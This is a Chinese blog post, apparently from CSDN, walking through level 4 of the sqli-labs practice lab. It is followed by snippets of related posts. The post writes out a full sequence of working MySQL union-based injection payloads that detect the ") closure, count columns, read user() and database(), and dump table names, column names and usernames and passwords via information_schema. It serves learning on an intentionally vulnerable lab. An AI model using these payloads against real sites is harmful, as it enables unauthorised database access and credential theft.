sqli-labs关卡4(基于get提交的双引号闭合的字符型注入)通关思路

已于 2024-01-16 19:46:29 修改
阅读量236 收藏 3
点赞数 7
分类专栏: # sqi-labs的1-4关通关详解 文章标签: 1024程序员节 sql web安全
于 2023-10-24 00:02:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zyh1588/article/details/134001574
版权

文章目录

前言

此文章只用于学习和反思巩固sql注入知识,禁止用于做非法攻击。注意靶场是可以练习的平台,不能随意去尚未授权的网站做渗透测试!!!

一、回顾第三关知识点

上节文章讲到的是基于get提交的单引号加括号闭合的字符型注入,通过前三关的练习,逐渐熟悉怎么判断字符型和数字型了,让我们看看这一关是什么类型的注入。

二、靶场第四关思路

  • 1、判断注入点(本关突破点)
  • 2、爆字段个数
  • 3、爆显位位置
  • 4、爆数据库名、版本、用户等等
  • 5、爆数据库表名
  • 6、爆数据库列名
  • 7、爆数据库数据

1.判断注入点

老规矩还是用and 1=1 和and 1=2测试,id=1 and 1=1;id=1 and 1=2发现页面都正常,排除数字型。那么就判断是什么字符型闭合了,直接id=1'提交看看是不是单引号闭合。(如图一所示)发现居然页面正常!!!这是为什么呢?
说明不是单引号闭合,可能是双引号闭合,再输入id=1"发现报错了(如图二所示)通过报错信息可知道是双引号加括号闭合。
图一
图二
这是报错信息

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘“1"”) LIMIT 0,1’ at line 1

(如图三所示)那么输入id=1")--+看看会不会页面正常,发现正常!!!那么我们就已经成功一半了。
图三
之后的步骤和前几关一样就不多赘述,直接上截图。

2-7步骤截图+注入语句

2.爆字段个数

id=1") order by 4--+

在这里插入图片描述
3、爆显位位置

id=-1") union select 1,2,3--+

在这里插入图片描述
4、爆数据库名、版本、用户等等

id=-1") union select 1,user(),database()--+

在这里插入图片描述
5、爆数据库表名

id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

在这里插入图片描述
6、爆数据库列名

id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name="users"--+

在这里插入图片描述
7、爆数据库数据

id=-1") union select 1,group_concat(username),group_concat(password) from users --+

在这里插入图片描述

总结

第四关的不同也是闭合的方式不同,通过这几关可以大致认识到字符型又分为单引号闭合、单引号加括号闭合、双引号闭合、双引号加括号闭合
符号也就单引号、双引号、括号这些。实战的时候多试一试就可以知道是什么闭合了。此文章是小白自己为了巩固sql注入而写的,大佬路过请多指教!

无名小卒且不会安全的zzyyhh
关注
  • 7
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
sqli-labs系列——第四
1匹黑马
04-26 3812
文章目录判断注入开始注入 判断注入 第四过滤了 ’ 但是没有过滤 " ,这个题跟第三题一样,之不过第三题过滤了 " 第四题过滤了 ’ 罢了。 看一下对比: 第三 第四 也就是说,第四sql语句是这样的: select * from user where id=("$id"); 那么exp也很好写了: -1") union SELECT 1,2,(select group_conca...
sqli-labs Less-32、33、34、35、36、37(sqli-labs闯指南 32、33、34、35、36、37)—宽字节注入
m0_54899775的博客
12-26 1800
sqli-labs Less-32、33、34、35、36、37(sqli-labs闯指南 32、33、34、35、36、37)—宽字节注入
SQLI-labs-第四
weixin_54055099的博客
09-04 781
SQLI第四思路跟步骤
sqli-labs靶场第四
gou1791241251的博客
12-19 1275
传入参数单引号页面显示正常,传入双引号时页面报错显示异常 第一步:判断注入字符还是数字 由报错信息可知注入双引号字符闭合方式是) and 1=1 --+时页面正常,and 1=2 --+时页面异常。说明闭合方式猜对了 ") 此时可以通过order by 来判断当前数据库表有多少个字段了 order by 3显示正常,order by 4显示异常,说明有三个字段。 可以通过union查询,查看页面回显位置 同样老套路查询一下当前数据库和当前版本号 通过information..
sqli-labs第四
TA不懒,但还没有添加简介
09-08 455
sqli-labs第四 第四根据提示知道是基于双引号的错误,于是通过注入判断发现还有类似第三的问题 构造一下sql语句 select 1,2,3 from table where id=("$id") 所以需要在1’后面增加一个") 然后使用order by 或者select 判断字段个数 然后和第一、第二一样的办法获得表、字段、数据 第一二详细 第三 总结 找到合适的注入点,通过反馈信息构造语句。 ...
sqli-labs---第四
最新发布
2201_75556700的博客
05-22 303
6、查询用户名和密码字段的值 ,用id分隔开方便观看。4、查询表名(有4张表,我们查询users这张表)3、查询数据库名(库名为security)可判断为字符闭合,")为闭合方式。2、查询列数,判断回显位置。5、查询users表中字段。id=1'(正常回显)id=1(正常回显)
SQLi-Labs系列之GET报错注入
ChuMeng1999的博客
10-28 377
phpStudy是一个PHP调试环境的程序集成包。该程序包集成最新的Apache+PHP+MySQL+phpMyAdmin+ZendOptimizer,一次性安装,无须配置即可使用,是非常方便、好用的PHP调试环境。
sqli-labs Less - 62、63、64、65(sqli-labs闯指南 62、63、64、65)
m0_54899775的博客
12-30 1860
sqli-labs Less - 62、63、64、65(sqli-labs闯指南 62、63、64、65)
sqli-labs Less-54、55、56、57(sqli-labs闯指南 54、55、56、57)
m0_54899775的博客
12-29 1633
sqli-labs Less-54、55、56、57(sqli-labs闯指南 54、55、56、57)
SQLi-LABS Page-1(Basic Challenges)1-22
05-18
#### Less1: GET 字符基于错误的单引号的注入 在本中,我们需要利用一个带有`id`参数的GET请求来进行SQL注入。当尝试输入`id=1`时,并在URL末尾添加单引号`'`时,会触发错误,而添加双引号`"`则不会触发错误...
Sqli-labs靶场第4详解[Sqli-labs-less-4]
m0_73615178的博客
02-19 409
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root注入攻击-user()
sqli-labs靶场1-4
qq_46527080的博客
12-12 277
第一 判断注入点: ?id=1 回显正常 ?id=1’ 回显错误 可以判断出是基于单引号注入 然后and判断一下 ?id=1’ and 1=1 回显正常 ?id=1’ and 1=2 回显错误 证明存在注入漏洞 则or 相反 ?id=1’ or 1=2 --+ (回显正常) ?id=1’ or 1=1 --+ (回显错误,证明存在注入漏洞)//(暂时没验证) 然后我们判断一下列数 ?id=1’ order by 3 --+(没报错) ?id=1’ order by 4 --+ (报错) 证明列数
sqlilab(1-4)
versus117的博客
05-26 107
注入方法差不多,第一题添加单引号会报错; 第二题需要将单引号编码 第三题,报错后会发现有个右括号。 union select null,table_name,null from information_schema.tables where table_schema = 'security' limit x,1 -- - 通过控制x参数获取security中有几张表 union select null,column_name,null from information_schema.columns wh
sqli-labs Lesson-4详细过程
Brad_的博客
10-17 504
OneNote粘贴为图片,最好自己动手试一下。
sqli-lab1到4详解
cangyu51462的博客
04-12 433
sqli-lab 1-4
2020.4.1 sqli-labs--第一至第四
DSR446的博客
04-01 320
1.验证方式:’ 或 and 1=1 and 1= 2 如果页面不显示内容或者报mysql错误,就说明存在注入。(get和post传参都可用) 2.mysql5.0以上的版本中,为了方便管理,默认定义了information_schema数据库,用来存储数据库元信息,其中具有表schemata(数据库名)、tables(表名)、columns(列名或字段名) schemata表中,s...
sqli-labs 基础篇1~4 详细通关解析
Lucky小小吴的小屋
01-08 697
在这里,就直接看到答案了,主要是因为他的源码构成的,当输入id=1时,会输出一个数据,恰好我们需要的账号和密码就是第一条数据,不过我们要按照顺序,慢慢爆。id=1’ ”,报错’ 1’ ') LIMIT 0,1 ,根据我们注入sql语句,可以判断出源码存在括号。根据《Web安全深度剖析》上,讲到sql数字注入存在验证方式,大致分为三步,满足三句话,即可能存在sql注入。id=1‘ ”,发现报错 ’ LIMIT 0,1。上述分析,我们注入时,不加分号,故接下来的数据库结构判断的sql注入语句是……
sqli-labtips 前四
weixin_44089266的博客
03-31 234
**前四均为一般sql注入,此处只对第一进行详解,之后三只是闭合方式的变化** 提前声明:本机测试地址为 192.168.226.136 以下仅供参考,切勿用作其他用途,若有错误之处,望见谅。 首先在未知闭合方式的条件下,构造payload进行测试 http://192.168.226.136/sqli-labs-master/Less-1/?id=1 观察到页面回显正常 重新...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

无名小卒且不会安全的zzyyhh

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值